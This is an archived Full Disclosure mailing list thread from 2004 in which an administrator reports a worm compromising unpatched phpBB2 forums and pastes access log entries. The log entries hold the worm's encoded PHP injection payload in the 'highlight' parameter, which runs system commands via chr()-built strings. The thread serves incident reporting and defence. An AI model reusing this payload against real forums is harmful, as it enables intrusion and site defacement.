Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Worm hitting PHPbb2 Forums
From: Christopher Adickes <christopher_adickes () SHI com>
Date: Tue, 21 Dec 2004 12:46:30 -0500

In addition to your post here is some more info.  

http://isc.sans.org/


-----Original Message-----
From: L. Walker [mailto:lwalker () magi net au] 
Sent: Tuesday, December 21, 2004 4:23 AM
To: incidents () securityfocus com
Cc: full-disclosure () lists netsys com
Subject: Worm hitting PHPbb2 Forums
Importance: High

Just spotted two clients hit by this.  One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. 
Chkrootkit says its Adore, however could be something else.  Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.

Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum.  Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]